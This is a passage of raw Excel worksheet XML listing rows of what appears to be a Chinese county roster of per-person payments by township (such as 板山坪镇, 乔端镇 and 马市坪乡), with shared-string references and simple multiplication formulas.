        <v>340</v>
      </c>
      <c r="J2622" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2622" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2623" ht="23" customHeight="1" spans="1:11">
      <c r="A2623" s="13" t="s">
        <v>6891</v>
      </c>
      <c r="B2623" s="14" t="s">
        <v>6881</v>
      </c>
      <c r="C2623" s="14" t="s">
        <v>3560</v>
      </c>
      <c r="D2623" s="14" t="s">
        <v>6892</v>
      </c>
      <c r="E2623" s="14" t="s">
        <v>284</v>
      </c>
      <c r="F2623" s="14" t="s">
        <v>6884</v>
      </c>
      <c r="G2623" s="14">
        <v>1</v>
      </c>
      <c r="H2623" s="14">
        <v>340</v>
      </c>
      <c r="I2623" s="14">
        <f t="shared" si="124"/>
        <v>340</v>
      </c>
      <c r="J2623" s="24">
        <v>45566</v>
      </c>
      <c r="K2623" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2624" ht="23" customHeight="1" spans="1:11">
      <c r="A2624" s="13" t="s">
        <v>6893</v>
      </c>
      <c r="B2624" s="14" t="s">
        <v>6881</v>
      </c>
      <c r="C2624" s="14" t="s">
        <v>6894</v>
      </c>
      <c r="D2624" s="14" t="s">
        <v>6895</v>
      </c>
      <c r="E2624" s="14" t="s">
        <v>6896</v>
      </c>
      <c r="F2624" s="90" t="s">
        <v>6884</v>
      </c>
      <c r="G2624" s="14">
        <v>1</v>
      </c>
      <c r="H2624" s="14">
        <v>340</v>
      </c>
      <c r="I2624" s="14">
        <f t="shared" si="124"/>
        <v>340</v>
      </c>
      <c r="J2624" s="24">
        <v>45658</v>
      </c>
      <c r="K2624" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2625" ht="23" customHeight="1" spans="1:11">
      <c r="A2625" s="13" t="s">
        <v>6897</v>
      </c>
      <c r="B2625" s="14" t="s">
        <v>6881</v>
      </c>
      <c r="C2625" s="14" t="s">
        <v>3560</v>
      </c>
      <c r="D2625" s="14" t="s">
        <v>6898</v>
      </c>
      <c r="E2625" s="14" t="s">
        <v>6899</v>
      </c>
      <c r="F2625" s="14" t="s">
        <v>6884</v>
      </c>
      <c r="G2625" s="14">
        <v>2</v>
      </c>
      <c r="H2625" s="14">
        <v>300</v>
      </c>
      <c r="I2625" s="14">
        <f t="shared" si="124"/>
        <v>600</v>
      </c>
      <c r="J2625" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2625" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2626" ht="23" customHeight="1" spans="1:11">
      <c r="A2626" s="13" t="s">
        <v>6900</v>
      </c>
      <c r="B2626" s="14" t="str">
        <f>B2625</f>
        <v>板山坪镇</v>
      </c>
      <c r="C2626" s="14" t="str">
        <f>C2625</f>
        <v>粮管所</v>
      </c>
      <c r="D2626" s="14" t="s">
        <v>6901</v>
      </c>
      <c r="E2626" s="19" t="s">
        <v>6902</v>
      </c>
      <c r="F2626" s="14" t="str">
        <f>F2625</f>
        <v>411321130801</v>
      </c>
      <c r="G2626" s="14"/>
      <c r="H2626" s="14"/>
      <c r="I2626" s="14"/>
      <c r="J2626" s="14"/>
      <c r="K2626" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2627" ht="23" customHeight="1" spans="1:11">
      <c r="A2627" s="13" t="s">
        <v>6903</v>
      </c>
      <c r="B2627" s="14" t="s">
        <v>6904</v>
      </c>
      <c r="C2627" s="14" t="s">
        <v>6904</v>
      </c>
      <c r="D2627" s="14" t="s">
        <v>6905</v>
      </c>
      <c r="E2627" s="14" t="s">
        <v>292</v>
      </c>
      <c r="F2627" s="14" t="s">
        <v>6906</v>
      </c>
      <c r="G2627" s="14">
        <v>1</v>
      </c>
      <c r="H2627" s="14">
        <v>340</v>
      </c>
      <c r="I2627" s="14">
        <f t="shared" ref="I2627:I2647" si="125">H2627*G2627</f>
        <v>340</v>
      </c>
      <c r="J2627" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2627" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2628" ht="23" customHeight="1" spans="1:11">
      <c r="A2628" s="13" t="s">
        <v>6907</v>
      </c>
      <c r="B2628" s="14" t="s">
        <v>6904</v>
      </c>
      <c r="C2628" s="14" t="s">
        <v>6904</v>
      </c>
      <c r="D2628" s="14" t="s">
        <v>6908</v>
      </c>
      <c r="E2628" s="14" t="s">
        <v>6909</v>
      </c>
      <c r="F2628" s="14" t="s">
        <v>6906</v>
      </c>
      <c r="G2628" s="14">
        <v>1</v>
      </c>
      <c r="H2628" s="14">
        <v>340</v>
      </c>
      <c r="I2628" s="14">
        <f t="shared" si="125"/>
        <v>340</v>
      </c>
      <c r="J2628" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2628" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2629" ht="23" customHeight="1" spans="1:11">
      <c r="A2629" s="13" t="s">
        <v>6910</v>
      </c>
      <c r="B2629" s="14" t="s">
        <v>6904</v>
      </c>
      <c r="C2629" s="14" t="s">
        <v>6904</v>
      </c>
      <c r="D2629" s="14" t="s">
        <v>6911</v>
      </c>
      <c r="E2629" s="14" t="s">
        <v>6912</v>
      </c>
      <c r="F2629" s="14" t="s">
        <v>6906</v>
      </c>
      <c r="G2629" s="14">
        <v>1</v>
      </c>
      <c r="H2629" s="14">
        <v>340</v>
      </c>
      <c r="I2629" s="14">
        <f t="shared" si="125"/>
        <v>340</v>
      </c>
      <c r="J2629" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2629" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2630" ht="23" customHeight="1" spans="1:11">
      <c r="A2630" s="13" t="s">
        <v>6913</v>
      </c>
      <c r="B2630" s="14" t="s">
        <v>6904</v>
      </c>
      <c r="C2630" s="14" t="s">
        <v>6904</v>
      </c>
      <c r="D2630" s="14" t="s">
        <v>6914</v>
      </c>
      <c r="E2630" s="14" t="s">
        <v>6915</v>
      </c>
      <c r="F2630" s="14" t="s">
        <v>6906</v>
      </c>
      <c r="G2630" s="14">
        <v>1</v>
      </c>
      <c r="H2630" s="14">
        <v>340</v>
      </c>
      <c r="I2630" s="14">
        <f t="shared" si="125"/>
        <v>340</v>
      </c>
      <c r="J2630" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2630" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2631" ht="23" customHeight="1" spans="1:11">
      <c r="A2631" s="13" t="s">
        <v>6916</v>
      </c>
      <c r="B2631" s="14" t="s">
        <v>6904</v>
      </c>
      <c r="C2631" s="14" t="s">
        <v>6904</v>
      </c>
      <c r="D2631" s="18" t="s">
        <v>577</v>
      </c>
      <c r="E2631" s="19" t="s">
        <v>6917</v>
      </c>
      <c r="F2631" s="14" t="s">
        <v>6906</v>
      </c>
      <c r="G2631" s="14">
        <v>1</v>
      </c>
      <c r="H2631" s="14">
        <v>340</v>
      </c>
      <c r="I2631" s="14">
        <f t="shared" si="125"/>
        <v>340</v>
      </c>
      <c r="J2631" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2631" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2632" ht="23" customHeight="1" spans="1:11">
      <c r="A2632" s="13" t="s">
        <v>6918</v>
      </c>
      <c r="B2632" s="14" t="s">
        <v>6904</v>
      </c>
      <c r="C2632" s="14" t="s">
        <v>6904</v>
      </c>
      <c r="D2632" s="14" t="s">
        <v>6919</v>
      </c>
      <c r="E2632" s="14" t="s">
        <v>6920</v>
      </c>
      <c r="F2632" s="14" t="s">
        <v>6906</v>
      </c>
      <c r="G2632" s="14">
        <v>1</v>
      </c>
      <c r="H2632" s="14">
        <v>340</v>
      </c>
      <c r="I2632" s="14">
        <f t="shared" si="125"/>
        <v>340</v>
      </c>
      <c r="J2632" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2632" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2633" ht="23" customHeight="1" spans="1:11">
      <c r="A2633" s="13" t="s">
        <v>6921</v>
      </c>
      <c r="B2633" s="14" t="s">
        <v>6904</v>
      </c>
      <c r="C2633" s="14" t="s">
        <v>6675</v>
      </c>
      <c r="D2633" s="14" t="s">
        <v>6922</v>
      </c>
      <c r="E2633" s="14" t="s">
        <v>6923</v>
      </c>
      <c r="F2633" s="14" t="s">
        <v>6906</v>
      </c>
      <c r="G2633" s="14">
        <v>1</v>
      </c>
      <c r="H2633" s="14">
        <v>350</v>
      </c>
      <c r="I2633" s="14">
        <f t="shared" si="125"/>
        <v>350</v>
      </c>
      <c r="J2633" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2633" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2634" ht="23" customHeight="1" spans="1:11">
      <c r="A2634" s="13" t="s">
        <v>6924</v>
      </c>
      <c r="B2634" s="14" t="s">
        <v>6904</v>
      </c>
      <c r="C2634" s="14" t="s">
        <v>5538</v>
      </c>
      <c r="D2634" s="14" t="s">
        <v>6925</v>
      </c>
      <c r="E2634" s="14" t="s">
        <v>6926</v>
      </c>
      <c r="F2634" s="14" t="s">
        <v>6906</v>
      </c>
      <c r="G2634" s="14">
        <v>1</v>
      </c>
      <c r="H2634" s="14">
        <v>340</v>
      </c>
      <c r="I2634" s="14">
        <f t="shared" si="125"/>
        <v>340</v>
      </c>
      <c r="J2634" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2634" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2635" ht="23" customHeight="1" spans="1:11">
      <c r="A2635" s="13" t="s">
        <v>6927</v>
      </c>
      <c r="B2635" s="14" t="s">
        <v>6904</v>
      </c>
      <c r="C2635" s="14" t="s">
        <v>3551</v>
      </c>
      <c r="D2635" s="14" t="s">
        <v>6928</v>
      </c>
      <c r="E2635" s="14" t="s">
        <v>6929</v>
      </c>
      <c r="F2635" s="14" t="s">
        <v>6930</v>
      </c>
      <c r="G2635" s="14">
        <v>1</v>
      </c>
      <c r="H2635" s="14">
        <v>340</v>
      </c>
      <c r="I2635" s="14">
        <f t="shared" si="125"/>
        <v>340</v>
      </c>
      <c r="J2635" s="14" t="s">
        <v>4822</v>
      </c>
      <c r="K2635" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2636" ht="23" customHeight="1" spans="1:11">
      <c r="A2636" s="13" t="s">
        <v>6931</v>
      </c>
      <c r="B2636" s="14" t="s">
        <v>6904</v>
      </c>
      <c r="C2636" s="14" t="s">
        <v>6355</v>
      </c>
      <c r="D2636" s="14" t="s">
        <v>6932</v>
      </c>
      <c r="E2636" s="14" t="s">
        <v>6933</v>
      </c>
      <c r="F2636" s="14" t="s">
        <v>6906</v>
      </c>
      <c r="G2636" s="14">
        <v>1</v>
      </c>
      <c r="H2636" s="14">
        <v>340</v>
      </c>
      <c r="I2636" s="14">
        <f t="shared" si="125"/>
        <v>340</v>
      </c>
      <c r="J2636" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2636" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2637" ht="23" customHeight="1" spans="1:11">
      <c r="A2637" s="13" t="s">
        <v>6934</v>
      </c>
      <c r="B2637" s="14" t="s">
        <v>6904</v>
      </c>
      <c r="C2637" s="14" t="s">
        <v>5551</v>
      </c>
      <c r="D2637" s="14" t="s">
        <v>6935</v>
      </c>
      <c r="E2637" s="14" t="s">
        <v>6936</v>
      </c>
      <c r="F2637" s="14" t="s">
        <v>6906</v>
      </c>
      <c r="G2637" s="14">
        <v>2</v>
      </c>
      <c r="H2637" s="14">
        <v>300</v>
      </c>
      <c r="I2637" s="14">
        <f t="shared" si="125"/>
        <v>600</v>
      </c>
      <c r="J2637" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2637" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2638" ht="23" customHeight="1" spans="1:11">
      <c r="A2638" s="13" t="s">
        <v>6937</v>
      </c>
      <c r="B2638" s="14" t="str">
        <f>B2637</f>
        <v>乔端镇</v>
      </c>
      <c r="C2638" s="14" t="str">
        <f>C2637</f>
        <v>县社</v>
      </c>
      <c r="D2638" s="84" t="s">
        <v>6938</v>
      </c>
      <c r="E2638" s="85" t="s">
        <v>6920</v>
      </c>
      <c r="F2638" s="14" t="str">
        <f>F2637</f>
        <v>4113211407</v>
      </c>
      <c r="G2638" s="14"/>
      <c r="H2638" s="14"/>
      <c r="I2638" s="14"/>
      <c r="J2638" s="14"/>
      <c r="K2638" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2639" ht="23" customHeight="1" spans="1:11">
      <c r="A2639" s="13" t="s">
        <v>6939</v>
      </c>
      <c r="B2639" s="14" t="s">
        <v>6940</v>
      </c>
      <c r="C2639" s="14" t="s">
        <v>6940</v>
      </c>
      <c r="D2639" s="14" t="s">
        <v>6941</v>
      </c>
      <c r="E2639" s="14" t="s">
        <v>6942</v>
      </c>
      <c r="F2639" s="14">
        <v>4113211507</v>
      </c>
      <c r="G2639" s="14">
        <v>2</v>
      </c>
      <c r="H2639" s="14">
        <v>300</v>
      </c>
      <c r="I2639" s="14">
        <f>H2639*G2639</f>
        <v>600</v>
      </c>
      <c r="J2639" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2639" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2640" ht="23" customHeight="1" spans="1:11">
      <c r="A2640" s="13" t="s">
        <v>6943</v>
      </c>
      <c r="B2640" s="14" t="str">
        <f>B2639</f>
        <v>马市坪乡</v>
      </c>
      <c r="C2640" s="14" t="str">
        <f>C2639</f>
        <v>马市坪乡</v>
      </c>
      <c r="D2640" s="13" t="s">
        <v>6944</v>
      </c>
      <c r="E2640" s="13" t="s">
        <v>448</v>
      </c>
      <c r="F2640" s="14">
        <f>F2639</f>
        <v>4113211507</v>
      </c>
      <c r="G2640" s="14"/>
      <c r="H2640" s="14"/>
      <c r="I2640" s="14"/>
      <c r="J2640" s="14"/>
      <c r="K2640" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2641" ht="23" customHeight="1" spans="1:11">
      <c r="A2641" s="13" t="s">
        <v>6945</v>
      </c>
      <c r="B2641" s="14" t="s">
        <v>6940</v>
      </c>
      <c r="C2641" s="14" t="s">
        <v>6940</v>
      </c>
      <c r="D2641" s="14" t="s">
        <v>6946</v>
      </c>
      <c r="E2641" s="14" t="s">
        <v>6947</v>
      </c>
      <c r="F2641" s="14">
        <v>4113211507</v>
      </c>
      <c r="G2641" s="14">
        <v>1</v>
      </c>
      <c r="H2641" s="14">
        <v>340</v>
      </c>
      <c r="I2641" s="14">
        <f t="shared" ref="I2641:I2667" si="126">H2641*G2641</f>
        <v>340</v>
      </c>
      <c r="J2641" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2641" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2642" ht="23" customHeight="1" spans="1:11">
      <c r="A2642" s="13" t="s">
        <v>6948</v>
      </c>
      <c r="B2642" s="14" t="s">
        <v>6940</v>
      </c>
      <c r="C2642" s="14" t="s">
        <v>6940</v>
      </c>
      <c r="D2642" s="14" t="s">
        <v>6949</v>
      </c>
      <c r="E2642" s="14" t="s">
        <v>6950</v>
      </c>
      <c r="F2642" s="14">
        <v>4113211507</v>
      </c>
      <c r="G2642" s="14">
        <v>1</v>
      </c>
      <c r="H2642" s="14">
        <v>340</v>
      </c>
      <c r="I2642" s="14">
        <f t="shared" si="126"/>
        <v>340</v>
      </c>
      <c r="J2642" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2642" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2643" ht="23" customHeight="1" spans="1:11">
      <c r="A2643" s="13" t="s">
        <v>6951</v>
      </c>
      <c r="B2643" s="14" t="s">
        <v>6940</v>
      </c>
      <c r="C2643" s="14" t="s">
        <v>6940</v>
      </c>
      <c r="D2643" s="14" t="s">
        <v>6952</v>
      </c>
      <c r="E2643" s="14" t="s">
        <v>6953</v>
      </c>
      <c r="F2643" s="14">
        <v>4113211507</v>
      </c>
      <c r="G2643" s="14">
        <v>1</v>
      </c>
      <c r="H2643" s="14">
        <v>340</v>
      </c>
      <c r="I2643" s="14">
        <f t="shared" si="126"/>
        <v>340</v>
      </c>
      <c r="J2643" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2643" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2644" ht="23" customHeight="1" spans="1:11">
      <c r="A2644" s="13" t="s">
        <v>6954</v>
      </c>
      <c r="B2644" s="14" t="s">
        <v>6940</v>
      </c>
      <c r="C2644" s="14" t="s">
        <v>5538</v>
      </c>
      <c r="D2644" s="14" t="s">
        <v>6955</v>
      </c>
      <c r="E2644" s="14" t="s">
        <v>6956</v>
      </c>
      <c r="F2644" s="14">
        <v>4113211507</v>
      </c>
      <c r="G2644" s="14">
        <v>1</v>
      </c>
      <c r="H2644" s="14">
        <v>340</v>
      </c>
      <c r="I2644" s="14">
        <f t="shared" si="126"/>
        <v>340</v>
      </c>
      <c r="J2644" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2644" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2645" ht="23" customHeight="1" spans="1:11">
      <c r="A2645" s="13" t="s">
        <v>6957</v>
      </c>
      <c r="B2645" s="14" t="s">
        <v>6940</v>
      </c>
      <c r="C2645" s="14" t="s">
        <v>5538</v>
      </c>
      <c r="D2645" s="14" t="s">
        <v>6958</v>
      </c>
      <c r="E2645" s="14" t="s">
        <v>6959</v>
      </c>
      <c r="F2645" s="14">
        <v>4113211507</v>
      </c>
      <c r="G2645" s="14">
        <v>1</v>
      </c>
      <c r="H2645" s="14">
        <v>340</v>
      </c>
      <c r="I2645" s="14">
        <f t="shared" si="126"/>
        <v>340</v>
      </c>
      <c r="J2645" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2645" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2646" ht="23" customHeight="1" spans="1:11">
      <c r="A2646" s="13" t="s">
        <v>6960</v>
      </c>
      <c r="B2646" s="14" t="s">
        <v>6940</v>
      </c>
      <c r="C2646" s="14" t="s">
        <v>6355</v>
      </c>
      <c r="D2646" s="14" t="s">
        <v>6961</v>
      </c>
      <c r="E2646" s="14" t="s">
        <v>6962</v>
      </c>
      <c r="F2646" s="14">
        <v>4113211507</v>
      </c>
      <c r="G2646" s="14">
        <v>1</v>
      </c>
      <c r="H2646" s="14">
        <v>340</v>
      </c>
      <c r="I2646" s="14">
        <f t="shared" si="126"/>
        <v>340</v>
      </c>
      <c r="J2646" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2646" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2647" ht="23" customHeight="1" spans="1:11">
      <c r="A2647" s="13" t="s">
        <v>6963</v>
      </c>
      <c r="B2647" s="14" t="s">
        <v>6940</v>
      </c>
      <c r="C2647" s="14" t="s">
        <v>6580</v>
      </c>
      <c r="D2647" s="14" t="s">
        <v>6964</v>
      </c>
      <c r="E2647" s="14" t="s">
        <v>6965</v>
      </c>
      <c r="F2647" s="14">
        <v>4113211507</v>
      </c>
      <c r="G2647" s="14">
        <v>1</v>
      </c>
      <c r="H2647" s="14">
        <v>340</v>
      </c>
      <c r="I2647" s="14">
        <f t="shared" si="126"/>
        <v>340</v>
      </c>
      <c r="J2647" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2647" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2648" ht="23" customHeight="1" spans="1:11">
      <c r="A2648" s="13" t="s">
        <v>6966</v>
      </c>
      <c r="B2648" s="14" t="s">
        <v>6940</v>
      </c>
      <c r="C2648" s="14" t="s">
        <v>3551</v>
      </c>
      <c r="D2648" s="14" t="s">
        <v>6967</v>
      </c>
      <c r="E2648" s="14" t="s">
        <v>6968</v>
      </c>
      <c r="F2648" s="14">
        <v>4113211507</v>
      </c>
      <c r="G2648" s="14">
        <v>1</v>
      </c>
      <c r="H2648" s="14">
        <v>340</v>
      </c>
      <c r="I2648" s="14">
        <f t="shared" si="126"/>
        <v>340</v>
      </c>
      <c r="J2648" s="14" t="s">
        <v>4751</v>
      </c>
      <c r="K2648" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2649" ht="23" customHeight="1" spans="1:11">
      <c r="A2649" s="13" t="s">
        <v>6969</v>
      </c>
      <c r="B2649" s="14" t="s">
        <v>6940</v>
      </c>
      <c r="C2649" s="14" t="s">
        <v>6970</v>
      </c>
      <c r="D2649" s="14" t="s">
        <v>6971</v>
      </c>
      <c r="E2649" s="14" t="s">
        <v>6972</v>
      </c>
      <c r="F2649" s="14">
        <v>4113211507</v>
      </c>
      <c r="G2649" s="14">
        <v>1</v>
      </c>
      <c r="H2649" s="14">
        <v>340</v>
      </c>
      <c r="I2649" s="14">
        <f t="shared" si="126"/>
        <v>340</v>
      </c>
      <c r="J2649" s="14" t="s">
        <v>4822</v>
      </c>
      <c r="K2649" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2650" ht="23" customHeight="1" spans="1:11">
      <c r="A2650" s="13" t="s">
        <v>6973</v>
      </c>
      <c r="B2650" s="14" t="s">
        <v>6940</v>
      </c>
      <c r="C2650" s="14" t="s">
        <v>5551</v>
      </c>
      <c r="D2650" s="14" t="s">
        <v>6974</v>
      </c>
      <c r="E2650" s="14" t="s">
        <v>6975</v>
      </c>
      <c r="F2650" s="14">
        <v>4113211507</v>
      </c>
      <c r="G2650" s="14">
        <v>1</v>
      </c>
      <c r="H2650" s="14">
        <v>340</v>
      </c>
      <c r="I2650" s="14">
        <f t="shared" si="126"/>
        <v>340</v>
      </c>
      <c r="J2650" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2650" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2651" ht="23" customHeight="1" spans="1:11">
      <c r="A2651" s="13" t="s">
        <v>6976</v>
      </c>
      <c r="B2651" s="14" t="s">
        <v>6940</v>
      </c>
      <c r="C2651" s="14" t="s">
        <v>5551</v>
      </c>
      <c r="D2651" s="14" t="s">
        <v>6977</v>
      </c>
      <c r="E2651" s="14" t="s">
        <v>6978</v>
      </c>
      <c r="F2651" s="14">
        <v>4113211507</v>
      </c>
      <c r="G2651" s="14">
        <v>1</v>
      </c>
      <c r="H2651" s="14">
        <v>340</v>
      </c>
      <c r="I2651" s="14">
        <f t="shared" si="126"/>
        <v>340</v>
      </c>
      <c r="J2651" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2651" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2652" ht="23" customHeight="1" spans="1:11">
      <c r="A2652" s="13" t="s">
        <v>6979</v>
      </c>
      <c r="B2652" s="14" t="s">
        <v>6980</v>
      </c>
      <c r="C2652" s="14" t="s">
        <v>6980</v>
      </c>
      <c r="D2652" s="14" t="s">
        <v>6981</v>
      </c>
      <c r="E2652" s="14" t="s">
        <v>584</v>
      </c>
      <c r="F2652" s="14" t="s">
        <v>6982</v>
      </c>
      <c r="G2652" s="14">
        <v>1</v>
      </c>
      <c r="H2652" s="14">
        <v>340</v>
      </c>
      <c r="I2652" s="14">
        <f t="shared" si="126"/>
        <v>340</v>
      </c>
      <c r="J2652" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2652" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2653" ht="23" customHeight="1" spans="1:11">
      <c r="A2653" s="13" t="s">
        <v>6983</v>
      </c>
      <c r="B2653" s="14" t="s">
        <v>6980</v>
      </c>
      <c r="C2653" s="14" t="s">
        <v>6980</v>
      </c>
      <c r="D2653" s="14" t="s">
        <v>6984</v>
      </c>
      <c r="E2653" s="14" t="s">
        <v>6985</v>
      </c>
      <c r="F2653" s="14" t="s">
        <v>6986</v>
      </c>
      <c r="G2653" s="14">
        <v>1</v>
      </c>
      <c r="H2653" s="14">
        <v>340</v>
      </c>
      <c r="I2653" s="14">
        <f t="shared" si="126"/>
        <v>340</v>
      </c>
      <c r="J2653" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2653" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2654" ht="23" customHeight="1" spans="1:11">
      <c r="A2654" s="13" t="s">
        <v>6987</v>
      </c>
      <c r="B2654" s="14" t="s">
        <v>6980</v>
      </c>
      <c r="C2654" s="14" t="s">
        <v>6980</v>
      </c>
      <c r="D2654" s="14" t="s">
        <v>6988</v>
      </c>
      <c r="E2654" s="14" t="s">
        <v>6989</v>
      </c>
      <c r="F2654" s="14" t="s">
        <v>6990</v>
      </c>
      <c r="G2654" s="14">
        <v>1</v>
      </c>
      <c r="H2654" s="14">
        <v>340</v>
      </c>
      <c r="I2654" s="14">
        <f t="shared" si="126"/>
        <v>340</v>
      </c>
      <c r="J2654" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2654" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2655" ht="23" customHeight="1" spans="1:11">
      <c r="A2655" s="13" t="s">
        <v>6991</v>
      </c>
      <c r="B2655" s="14" t="s">
        <v>6980</v>
      </c>
      <c r="C2655" s="14" t="s">
        <v>6980</v>
      </c>
      <c r="D2655" s="14" t="s">
        <v>6992</v>
      </c>
      <c r="E2655" s="14" t="s">
        <v>6993</v>
      </c>
      <c r="F2655" s="14" t="s">
        <v>6990</v>
      </c>
      <c r="G2655" s="14">
        <v>1</v>
      </c>
      <c r="H2655" s="14">
        <v>340</v>
      </c>
      <c r="I2655" s="14">
        <f t="shared" si="126"/>
        <v>340</v>
      </c>
      <c r="J2655" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2655" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2656" ht="23" customHeight="1" spans="1:11">
      <c r="A2656" s="13" t="s">
        <v>6994</v>
      </c>
      <c r="B2656" s="14" t="s">
        <v>6980</v>
      </c>
      <c r="C2656" s="14" t="s">
        <v>6980</v>
      </c>
      <c r="D2656" s="14" t="s">
        <v>6995</v>
      </c>
      <c r="E2656" s="14" t="s">
        <v>6996</v>
      </c>
      <c r="F2656" s="14" t="s">
        <v>6997</v>
      </c>
      <c r="G2656" s="14">
        <v>1</v>
      </c>
      <c r="H2656" s="14">
        <v>340</v>
      </c>
      <c r="I2656" s="14">
        <f t="shared" si="126"/>
        <v>340</v>
      </c>
      <c r="J2656" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2656" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2657" ht="23" customHeight="1" spans="1:11">
      <c r="A2657" s="13" t="s">
        <v>6998</v>
      </c>
      <c r="B2657" s="14" t="s">
        <v>6980</v>
      </c>
      <c r="C2657" s="14" t="s">
        <v>6980</v>
      </c>
      <c r="D2657" s="14" t="s">
        <v>6999</v>
      </c>
      <c r="E2657" s="14" t="s">
        <v>7000</v>
      </c>
      <c r="F2657" s="14" t="s">
        <v>6986</v>
      </c>
      <c r="G2657" s="14">
        <v>1</v>
      </c>
      <c r="H2657" s="14">
        <v>340</v>
      </c>
      <c r="I2657" s="14">
        <f t="shared" si="126"/>
        <v>340</v>
      </c>
      <c r="J2657" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2657" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2658" ht="23" customHeight="1" spans="1:11">
      <c r="A2658" s="13" t="s">
        <v>7001</v>
      </c>
      <c r="B2658" s="14" t="s">
        <v>6980</v>
      </c>
      <c r="C2658" s="14" t="s">
        <v>3551</v>
      </c>
      <c r="D2658" s="14" t="s">
        <v>7002</v>
      </c>
      <c r="E2658" s="14" t="s">
        <v>7003</v>
      </c>
      <c r="F2658" s="14" t="s">
        <v>6986</v>
      </c>
      <c r="G2658" s="14">
        <v>1</v>
      </c>
      <c r="H2658" s="14">
        <v>340</v>
      </c>
      <c r="I2658" s="14">
        <f t="shared" si="126"/>
        <v>340</v>
      </c>
      <c r="J2658" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2658" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2659" ht="23" customHeight="1" spans="1:11">
      <c r="A2659" s="13" t="s">
        <v>7004</v>
      </c>
      <c r="B2659" s="14" t="s">
        <v>6980</v>
      </c>
      <c r="C2659" s="14" t="s">
        <v>7005</v>
      </c>
      <c r="D2659" s="14" t="s">
        <v>7006</v>
      </c>
      <c r="E2659" s="14" t="s">
        <v>7007</v>
      </c>
      <c r="F2659" s="14" t="s">
        <v>7008</v>
      </c>
      <c r="G2659" s="14">
        <v>1</v>
      </c>
      <c r="H2659" s="14">
        <v>340</v>
      </c>
      <c r="I2659" s="14">
        <f t="shared" si="126"/>
        <v>340</v>
      </c>
      <c r="J2659" s="14" t="s">
        <v>7009</v>
      </c>
      <c r="K2659" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2660" ht="23" customHeight="1" spans="1:11">
      <c r="A2660" s="13" t="s">
        <v>7010</v>
      </c>
      <c r="B2660" s="14" t="s">
        <v>6980</v>
      </c>
      <c r="C2660" s="14" t="s">
        <v>7011</v>
      </c>
      <c r="D2660" s="14" t="s">
        <v>7012</v>
      </c>
      <c r="E2660" s="14" t="s">
        <v>7013</v>
      </c>
      <c r="F2660" s="14" t="s">
        <v>7014</v>
      </c>
      <c r="G2660" s="14">
        <v>1</v>
      </c>
      <c r="H2660" s="14">
        <v>340</v>
      </c>
      <c r="I2660" s="14">
        <f t="shared" si="126"/>
        <v>340</v>
      </c>
      <c r="J2660" s="14" t="s">
        <v>7015</v>
      </c>
      <c r="K2660" s="14" t="s">
        <v>225</v>
      </c>
    </row>
